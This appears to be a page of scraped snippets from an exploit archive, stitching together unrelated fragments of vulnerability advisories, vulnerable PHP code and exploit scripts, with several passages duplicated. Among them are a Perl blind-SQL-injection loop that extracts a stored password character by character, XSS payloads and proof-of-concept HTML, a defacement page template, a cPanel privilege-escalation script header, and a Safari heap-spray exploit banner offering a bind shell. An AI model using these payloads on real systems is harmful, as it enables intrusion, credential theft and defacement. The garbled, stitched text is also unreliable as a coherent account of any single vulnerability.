Next Page >>
div
id=``command_centerlocalhost`` name=``command_centerlocalhost``>
<fieldset style=``background-color: rgb(255, 255, 255); border: 0px
none; padding: 10px;`` width=``90%``><legend style=``
font-weight: normal; border: 0px none;``><font color=``#303030``
style=``font-weight: bold;``>Command Center for localhost
</font> </legend></fieldset> <div align=``left``
style=``background-color: rgb(255, 255, 255); width: 90%;``><div align=``
left`` style=``width: 500px; border: 1px solid rgb(177, 192,
240);``><input type=``hidden`` value=``pserver``
name=``frm_o_o[0][class]``/>
<input type=``hidden`` value=``localhost`` name=``frm_o_o[0][nname]``/>
Server: demo.endian.com/
Path: /cgi-bin/
File: proxyconfig.cgi
<div id="page-content-box"> <div id="notification-view" class="spinner" style="display:none"></div>
<div id="module-content">
<script type="text/javascript">
$(document).ready(function() {
/* Enable visualization of service notifications */
display_notifications(["squid","dansguardian","havp","sarg"], {"startMessage": "Proxy settings are being
tunnels between Astaro installations, administrators can save management time and automate many of the tasks involved in successfully linking
sites together with encrypted links. The Astaro Command Center is an entirely free product that allows you to centrally monitor and maintain
multiple Astaro installations & devices. If you currently are responsible for more than one Astaro Gateway product, ACC is designed for you!
Read on for more information. Starting with this release, it is now possible to setup site-to-site VPN tunnels with an amazing degree of ease
from within Astaro Command Center itself. Simply indicate the devices to be joined together via VPN, select a few options, and the rest is
automated with no need to login to each individual WebAdmin for the configuration. ACC is presented in the same administrative style as our AxG
Version 7 WebAdmin, so that if you are new to ACC you will have no trouble getting started within a familiar looking environment.
(Copy from vendors homepage: http://up2date.astaro.com/2009/03/astaro_comand_center_20_releas.html#more)
tunnels between Astaro installations, administrators can save management time and automate many of the tasks involved in successfully linking
sites together with encrypted links. The Astaro Command Center is an entirely free product that allows you to centrally monitor and maintain
multiple Astaro installations & devices. If you currently are responsible for more than one Astaro Gateway product, ACC is designed for you!
Read on for more information. Starting with this release, it is now possible to setup site-to-site VPN tunnels with an amazing degree of ease
from within Astaro Command Center itself. Simply indicate the devices to be joined together via VPN, select a few options, and the rest is
automated with no need to login to each individual WebAdmin for the configuration. ACC is presented in the same administrative style as our AxG
Version 7 WebAdmin, so that if you are new to ACC you will have no trouble getting started within a familiar looking environment.
(Copy from vendors homepage: http://up2date.astaro.com/2009/03/astaro_comand_center_20_releas.html#more)
####templates/admin/loign.tpl
<form method="post" action="$sLoginPage" name="form">
<fieldset>
<input type="hidden" name="sLoginPageNext" value="$_SERVER[REQUEST_URI]" />
<div id="login"><label>$lang['Login']:</label><input type="text"
name="sLogin" class="input" value="$_COOKIE[sLogin]" /></div> //XSS
<div id="pass"><label>$lang['Password']:</label><input
type="password" name="sPass" class="input" value="" /></div>
<div id="submit"><input type="submit" value="$lang['log_in']
»" /></div>
The vulnerabilities can be exploited by remote attacker with low or high required user inter action.
For demonstration or reproduce ...
<td xmlns="http://www.w3.org/1999/xhtml" class="layoutColumn center">
<div id="messageBlock" class="block">
<div class="blockContents messageContents">
<table class="messageBlock">
<tbody><tr><td>
<img title="_FAILURE" alt="_FAILURE" class="sprite32 sprite32-warning" src="themes/default/images/others/transparent.gif"/>
####################
- Code Snippet:
####################
themes/default/index.php #line:14-17
<div id="twocols" class="clearfix">
<div id="maincol" >maincol<?php include($main);?></div>
<div id="rightcol" >right col<?php include($right);?></div>
</div>
####################
Proof of Concept:
=================
The vulnerability can be exploited by remote attackers. For demonstration or reproduce ...
<div id="curmessage"><span class="msgOut"><div class="msgSender">2010-12-28 18:49:22</div><div style="background: url("GreenTopLeft.gif")
no-repeat scroll left top transparent;" class="msgContainer"><div style="background: url("GreenTopRight.gif") no-repeat scroll right top
transparent;" class="msgTopRight"></div><div style="background: url("GreenTop.gif") repeat-x scroll left top transparent;" class="msgTop">
</div><div class="msg">Wir sind schon los, zuspatkommen macht keinen guten Eindruck.<div style="background: url("GreenMiddle.gif") repeat
scroll left top transparent;" class="msgMiddle"></div><div style="background: url("GreenLeft.gif") repeat-y scroll left top transparent;"
/-----
hq/web/common/GenericError.jsp:
...
<c:if test="${not empty exception}">
<div id="exception" style="visibility:hidden">
<%=StringUtil.getStackTrace(exception)%>
</div>
<c:if test="${not empty root}">
<div id="root" style="visibility:hidden">
<%=StringUtil.getStackTrace(root)%>
} else {
echo "error : ".php_uname();
}
} else {
?>
<div align="center">
<h3>Deadly Script</h3>
<font color=red>Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</font><br />
<pre><div align="center">
</pre></div><br />
<table border="0" cellspacing="0">
"https://<server>:3001/adminDownloads.htm" does not show any content in
the browser view. However the HTML-source of this frame contains
sensitive information like an administrative call server user account:
---
<div id="call_server_host" value="10.11.12.13"></div> [...]
<div id="call_server_telnet_port" value="23"></div> [...]
<div id="call_server_user" value="admin123"></div>
<div id="call_server_pwd" value="hugo123"></div>
---
+++include/admin/banlist.php @@ 88:104
88 if($_GET["curr"] && $_GET["delete"]){
89
90 ?>
91
92 <div class="PhorumInfoMessage">
93 Are you sure you want to delete this entry?
94 <form action="<?php echo $PHORUM["admin_http_path"] ?>" method="post">
95 <input type="hidden" name="module" value="<?php echo $module; ?>" />
XXX 96 <input type="hidden" name="curr" value="<?php echo $_GET['curr']; ?>" />
97 <input type="hidden" name="delete" value="1" />
MAXLENGTH=16><br /><span style="color: #666;">Your Passcode is your PIN
+ the number displayed on your token (the Tokencode).</span></TD>
</TR>
</TABLE>
</div>
<P class="buttons">
<INPUT TYPE=SUBMIT VALUE="Log In">
<INPUT TYPE=RESET VALUE="Reset">
</P>
MAXLENGTH=16><br /><span style="color: #666;">Your Passcode is your PIN
+ the number displayed on your token (the Tokencode).</span></TD>
</TR>
</TABLE>
</div>
<P class="buttons">
<INPUT TYPE=SUBMIT VALUE="Log In">
<INPUT TYPE=RESET VALUE="Reset">
</P>
$content = @mysql_fetch_array(mysql_query('select var from '.$dbFIX.'layout_config where opt = \'page\' and var like \''.$_GET['id'].'|%\'')); // <= 3
$content = str_replace($_GET['id'].'|', '', $content['var']);
$path = 'layout/'.$config['theme'];
include 'layout/'.$config['theme'].'/head.page.php'; //
?>
<div id="mainFrame"><?php echo $content; ?></div>
<div class="clear"></div>
<?php
include 'layout/'.$config['theme'].'/foot.page.php'; //
<td><a onclick="openEdit('/popup/properties/1194/orig/page/88')" href="javascript:void(1194)
" class="">">​​​​​<iframe a="" <<="" onload='alert("VulnerabilityLab")' src="a"></td>
<td>page/default</td>
<td>0</td>
<td>0</td>
<td><div class="onxshop_page_properties"><a class="onxshop_delete"
title="Delete default" href="#1194"><span>Delete</span></a></div></td></tr>
</tbody>
</table>
$content = @mysql_fetch_array(mysql_query('select var from '.$dbFIX.'layout_config where opt = \'page\' and var like \''.$_GET['id'].'|%\''));
$content = str_replace($_GET['id'].'|', '', $content['var']);
$path = 'layout/'.$config['theme'];
include 'layout/'.$config['theme'].'/head.page.php'; // <= 1
?>
<div id="mainFrame"><?php echo $content; ?></div>
<div class="clear"></div>
<?php
include 'layout/'.$config['theme'].'/foot.page.php'; // <= 2
Baidu Hi IM client software DoS bug, div zero make client crash
-- CVE ID:
Not assigned
-- Affected Vendors:
Baidu
-- Affected Products:
Baidu Hi IM software
MAXLENGTH=16><br /><span style="color: #666;">Your Passcode is your PIN
+ the number displayed on your token (the Tokencode).</span></TD>
</TR>
</TABLE>
</div>
<P class="buttons">
<INPUT TYPE=SUBMIT VALUE="Log In">
<INPUT TYPE=RESET VALUE="Reset">
</P>
MAXLENGTH=16><br /><span style="color: #666;">Your Passcode is your PIN
+ the number displayed on your token (the Tokencode).</span></TD>
</TR>
</TABLE>
</div>
<P class="buttons">
<INPUT TYPE=SUBMIT VALUE="Log In">
<INPUT TYPE=RESET VALUE="Reset">
</P>
For demonstration or reproduce ...
Code Review: Users - User Listing
<div style="display: inline; vertical-align: middle; white-space: nowrap; padding: 4px 2px 4px 0px;">>"<INCLUDE PERSISTENT SCRIPTCODE HERE!!!>
</div> <span>Known IP addresses of user '>"<INCLUDE PERSISTENT SCRIPTCODE HERE!!!>'</iframe></span>
Code Review: Add New Network Listing
The HTML response is below:
<html>
<form name="ctl01" method="post"
action="xss.aspx" id="ctl01">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxYCHglpbm5lcmh0b
WwFHTxzY3JpcHQ+YWxlcnQoJ3hzcycpPC9zY3JpcHQ+ZGQ=" />
</div>
<script>alert('xss')</script></form>
code. This library mitigates against several issues independently
reported by Red Hat Security Response Team member Marc Schoenefeld
and Mozilla security researcher Christoph Diehl (CVE-2010-3768).
Security researcher wushi of team509 reported that when a XUL tree
had an HTML <div> element nested inside a <treechildren> element then
code attempting to display content in the XUL tree would incorrectly
treat the <div> element as a parent node to tree content underneath
it resulting in incorrect indexes being calculated for the child
content. These incorrect indexes were used in subsequent array
operations which resulted in writing data past the end of an allocated
code. This library mitigates against several issues independently
reported by Red Hat Security Response Team member Marc Schoenefeld
and Mozilla security researcher Christoph Diehl (CVE-2010-3768).
Security researcher wushi of team509 reported that when a XUL
tree had an HTML \<div\> element nested inside a \<treechildren\>
element then code attempting to display content in the XUL tree would
incorrectly treat the \<div\> element as a parent node to tree content
underneath it resulting in incorrect indexes being calculated for the
child content. These incorrect indexes were used in subsequent array
operations which resulted in writing data past the end of an allocated
$k=1;
$z=48;
while(($k<=32) && ($z<=126)){
my $blindsql=$_[0].'+AND+ascii(substring((SELECT+password+FROM+config),'.$k.',1))='.$z.'%23';
$output=&request($blindsql);
if ( $output =~ (/\<div id=\"descrp\">([a-zA-Z0-9\s]+)\<\/div\>/))
{
$pass=$pass.chr($z);
$k++;
$z=47;
}
The HTML response is below:
<html>
<form name="ctl01" method="post"
action="xss.aspx" id="ctl01">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxYCHglpbm5lcmh0bWwFHTxzY3JpcHQ+YWxlcnQoJ3hzcycpPC9zY3JpcHQ+ZGQ=" />
</div>
<script>alert('xss')</script></form>
</html>
-------------
Microsoft Anti-XSS Library 3.0 and 4.0 are vulnerable to an attack in which an attacker is able to create a specially formed CSS, that after passing through the GetSafeHTML or GetSafeHtmlFragment methods, contains an expression that triggers a JavaScript call in Internet Explorer.
The following ASP.NET code demonstrates the vulnerability:
1. string data = Microsoft.Security.Application.Sanitizer.GetSafeHtml("<html>a<style><!--div{font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'}--></style><div>b</div></html>");
2. string data = Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment("<div style=\"font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'\">aaa</div>");
Explanation
-----------
<html>
<head>
<title>HACKED BY YOUR-NAME</title>
</head>
<body>
<div id="iFrame1" style="position:absolute; left:0px; top:0px; z-index:0">
<iframe name="iFrame1" width=1024 height=3186 src="http://YOUR-SITE/YOUR-PATH/YOUR.html" scrolling="no" frameborder="0"></iframe>
</div>
</body>
</html>
Copyright (C) 2009-2010 firelinking by eidelweiss
</br>
Apple Safari (heap spray) Remote BOF Exploit for osX
Bind Shell Delivered on Port: 4444
</br>
<div id="content">
<p><FONT> </FONT></p>
<p><FONT>Behahahahahaahahhsyuuuuucrash</FONT></p>
<p><FONT>Crooooooooooooooot</FONT></p>
<p><FONT>Modyaaaaaaaar </FONT></p>
</div>
$db_prefix=$ARGV[6];
}
#Testing
my $finalrequest = $finalhost;
$output=&request($uid,$code,$finalrequest);
if ( $output =~ /<div class="title">Access denied<\/div>/)
{
print "\t-----------------------------------------------------------------\n";
print "\tYour credentials are not correct! This exploits need login.\n";
print "\tOptions: [your-id-user],[your-password] incorrect.\n";
print "\tExploit failed! No luck!\n";
Next Page>>
|
